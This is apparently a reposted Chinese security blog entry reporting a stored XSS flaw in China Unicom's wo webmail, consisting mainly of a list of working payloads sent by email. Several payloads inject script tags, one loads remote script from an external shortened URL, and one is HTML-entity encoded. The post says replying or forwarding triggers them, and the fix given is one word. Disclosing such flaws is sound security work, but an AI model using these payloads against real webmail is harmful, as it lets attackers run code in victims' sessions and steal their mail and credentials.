记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

联通wo邮箱存储型XSS

2014-01-18 16:00
给邮箱发一封邮件,由于QQ邮箱发到wo邮箱总是投递不成功,内容我直接贴上来吧
 

"><script>alert("跨站")</script>

"><script src=http://goo.gl/Hprf82></script>

"></textarea><script src=http://goo.gl/Hprf82></script>

"><IMG SRC=1 onerror=alert(/XSS/)>

&#34;&#62;&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#36328;&#31449;&#34;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

 
收到邮件后,点击上面的"回复、回复全部、转发"任意一个就能触发XSS
 
 


修复方案:
过滤
知识来源: www.2cto.com/Article/201401/273619.html

阅读:106821 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“联通wo邮箱存储型XSS”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云